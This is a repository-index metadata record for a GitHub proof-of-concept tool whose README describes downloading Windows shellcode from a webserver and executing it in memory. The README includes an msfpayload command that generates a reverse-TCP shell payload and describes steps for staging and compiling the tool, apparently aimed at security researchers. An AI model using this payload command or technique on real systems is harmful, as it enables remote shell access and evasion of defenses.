{"id":18110730,"url":"https://github.com/secretsquirrel/shellcode_retriever","last_synced_at":"2025-04-14T01:09:39.029Z","repository":{"id":10115452,"uuid":"12182858","full_name":"secretsquirrel/shellcode_retriever","owner":"secretsquirrel","description":"POC of code that downloads and executes shellcode in memory.","archived":false,"fork":false,"pushed_at":"2014-05-25T16:59:06.000Z","size":235,"stargazers_count":80,"open_issues_count":0,"forks_count":46,"subscribers_count":10,"default_branch":"master","last_synced_at":"2025-04-14T01:09:28.383Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/secretsquirrel.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2013-08-17T17:48:14.000Z","updated_at":"2024-10-22T00:07:51.000Z","dependencies_parsed_at":"2022-09-01T12:41:55.671Z","dependency_job_id":null,"html_url":"https://github.com/secretsquirrel/shellcode_retriever","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/secretsquirrel%2Fshellcode_retriever","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/secretsquirrel%2Fshellcode_retriever/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/secretsquirrel%2Fshellcode_retriever/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/secretsquirrel%2Fshellcode_retriever/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/secretsquirrel","download_url":"https://codeload.github.com/secretsquirrel/shellcode_retriever/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":248804825,"owners_count":21164135,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-11-01T00:11:17.377Z","updated_at":"2025-04-14T01:09:39.002Z","avatar_url":"https://github.com/secretsquirrel.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"##Shellcode Retriever\nDownloads win32 shellcode from webservers and executes the shellcode without it touching disk (using the following method: http://www.debasish.in/2012_04_01_archive.html)\n\nDemo:\n\nhttp://www.youtube.com/watch?v=R15B2p-uWKY\n\n---\n\nFor use by IT Security professionals and researchers.\n\nUsage:\n\nCreate shellcode using the following msfpayload command:\n\nmsfpayload windows/shell_reverse_tcp LHOST=192.168.0.1 LPORT=8080 EXITFUNC=thread R \u003e test.txt\n\nNotice the exit function, very important if you want the process to run and beacon out based on timeouts in the source code.\n\nUpload the shellcode to your webserver.\n\nCompile the python code to an executeable by using pyinstaller.\n\n\n---\n\n##License:   GPLv3\n\n\n    Shellcode Retriever\n\n    Author Joshua Pitts the.midnite.runr 'at' gmail \u003cd ot \u003e com\n    \n    Copyright (C) 2013, Joshua Pitts\n\n    License:   GPLv3\n\n    This program is free software: you can redistribute it and/or modify\n    it under the terms of the GNU General Public License as published by\n    the Free Software Foundation, either version 3 of the License, or\n    (at your option) any later version.\n\n    This program is distributed in the hope that it will be useful,\n    but WITHOUT ANY WARRANTY; without even the implied warranty of\n    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\n    GNU General Public License for more details.\n\n    See \u003chttp://www.gnu.org/licenses/\u003e for a copy of the GNU General\n    Public License\n\n    This program is to be used for only legal activities by IT security\n    professionals and researchers. Author not responsible for malicious\n    uses.","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fsecretsquirrel%2Fshellcode_retriever","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fsecretsquirrel%2Fshellcode_retriever","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fsecretsquirrel%2Fshellcode_retriever/lists"}